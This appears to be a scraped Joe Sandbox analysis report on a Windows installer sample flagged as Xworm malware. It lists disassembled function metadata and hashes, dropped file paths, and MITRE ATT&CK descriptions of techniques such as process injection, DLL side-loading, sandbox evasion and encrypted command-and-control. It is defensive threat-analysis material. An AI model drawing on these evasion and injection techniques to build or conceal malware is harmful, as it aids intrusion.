Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 3330ca1177ecf381c9b61cd53052eeeb83ce566aea6ed0c581734a04447d8aa1
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: F9114B3641015EBBCF22AE95EC01CEE3F62FF59350F588455FE2859831D236CAB1AB81

Function 00C22A20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00C22A3B

Part of subcall function 00C24361: std::exception::exception.LIBCMT ref: 00C24376
Part of subcall function 00C24361: __CxxThrowException@8.LIBCMT ref: 00C2438B

std::_Xinvalid_argument.LIBCPMT ref: 00C22A52

Strings

string too long, xrefs: 00C22A36, 00C22A4D

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throwstd::exception::exception
String ID: string too long
API String ID: 3336028256-2556327735
Opcode ID: 94510e11bc940ec69a4a7cc64b6d7fb5a156894c77e1045880e8739ab0d11636
Instruction ID: d366cff6ed1c7d9f5a5b00ddff4f931df707022a33dcab55d644ebb3569e1915
Opcode Fuzzy Hash: 94510e11bc940ec69a4a7cc64b6d7fb5a156894c77e1045880e8739ab0d11636
Instruction Fuzzy Hash: 7D11E933300620ABD731E95CB880A6AF7E9EFA5760F10062FF592C7E91C7B19D0093A5

Function 00C22710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00C22724

Part of subcall function 00C24361: std::exception::exception.LIBCMT ref: 00C24376
Part of subcall function 00C24361: __CxxThrowException@8.LIBCMT ref: 00C2438B

_memmove.LIBCMT ref: 00C2276B

Strings

string too long, xrefs: 00C2271F

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: string too long
API String ID: 22950630-2556327735
Opcode ID: 17f0c633f45903d27d873b7ae0a853b5fc0d7478250032e1ae3e2368b4ff5ac7
Instruction ID: 3511bf12c40fb8d90788ae37615d8b5abc293018b09a776ec3dfedf6e83931c1
Opcode Fuzzy Hash: 17f0c633f45903d27d873b7ae0a853b5fc0d7478250032e1ae3e2368b4ff5ac7
Instruction Fuzzy Hash: E2110B311183306FEB24DD78F8C0A2EB7A8EF51B24F240A2EE497C3982DB71A5448351

Function 00C24100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00C2411C

Part of subcall function 00C243AE: std::exception::exception.LIBCMT ref: 00C243C3
Part of subcall function 00C243AE: __CxxThrowException@8.LIBCMT ref: 00C243D8

Part of subcall function 00C22710: std::_Xinvalid_argument.LIBCPMT ref: 00C22724

_memmove.LIBCMT ref: 00C24177

Strings

invalid string position, xrefs: 00C24117

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
String ID: invalid string position
API String ID: 1253240057-1799206989
Opcode ID: f08865c9a6bd955b2e1b2da56805b801dc0308fe0db40decdb04e74bd6ddb32b
Instruction ID: f4da84bd2f5f77ce73651687712883cff9ecffd61cb39adf834ea926c0244bc4
Opcode Fuzzy Hash: f08865c9a6bd955b2e1b2da56805b801dc0308fe0db40decdb04e74bd6ddb32b
Instruction Fuzzy Hash: DF11EB31304230A7CB2CDE08FC41A5EB3A5EBA5710F10091DF912CBA81DBB0DD918795

Function 00C22620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00C22636

Part of subcall function 00C243AE: std::exception::exception.LIBCMT ref: 00C243C3
Part of subcall function 00C243AE: __CxxThrowException@8.LIBCMT ref: 00C243D8

_memmove.LIBCMT ref: 00C2266F

Strings

invalid string position, xrefs: 00C22631

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 22950630-1799206989
Opcode ID: b370a9f6c8cd909fae1f32169a11411e320971d79253f9a7de93debbd297b01d
Instruction ID: d4874c9a844642f8ffd2561865aa9f9899f824bbaea3017f8aa050e8fa770369
Opcode Fuzzy Hash: b370a9f6c8cd909fae1f32169a11411e320971d79253f9a7de93debbd297b01d
Instruction Fuzzy Hash: E4019633300220ABD725DD6CFC8096AB7EAEB95750B24492DF195CBF45D6B1EC4293A4

Function 00C284C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C252BF: __getptd.LIBCMT ref: 00C252C5
Part of subcall function 00C252BF: __getptd.LIBCMT ref: 00C252D5

__getptd.LIBCMT ref: 00C284D8

Part of subcall function 00C29DF0: __getptd_noexit.LIBCMT ref: 00C29DF3
Part of subcall function 00C29DF0: __amsg_exit.LIBCMT ref: 00C29E00

__getptd.LIBCMT ref: 00C284E6

Strings

csm, xrefs: 00C284F4

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 7ac9b9e78d102514e922c48253c2e6458c63c24901c13d7d1d05d3f499542958
Instruction ID: 0fe625f3e6a16ca110b498b353278c46132d567fddec8e3f5f985500368639f5
Opcode Fuzzy Hash: 7ac9b9e78d102514e922c48253c2e6458c63c24901c13d7d1d05d3f499542958
Instruction Fuzzy Hash: 76014B75802229CBEF359F24F4406ADB3F5BF20311F64442DF4A156EA1CF308A98EB51

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 33__Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Downloads\ind.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\330[1].ccp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
33__Installer.exe

Function 00C23910 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105
networkfileCOMMON

Function 06177CB0 Relevance: 2.8, Strings: 2, Instructions: 332
COMMON

Function 00C21210 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 87
filesleepmemoryCOMMON

Function 03CAFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Function 03CB00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Function 00C23A70 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 21
memoryCOMMON

Function 00C24638 Relevance: 4.6, APIs: 3, Instructions: 74
COMMON

Function 00C27E8D Relevance: 4.6, APIs: 3, Instructions: 58
COMMONLIBRARYCODE

Function 00C23100 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 206
COMMON

Function 03CAFB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Function 00C26312 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE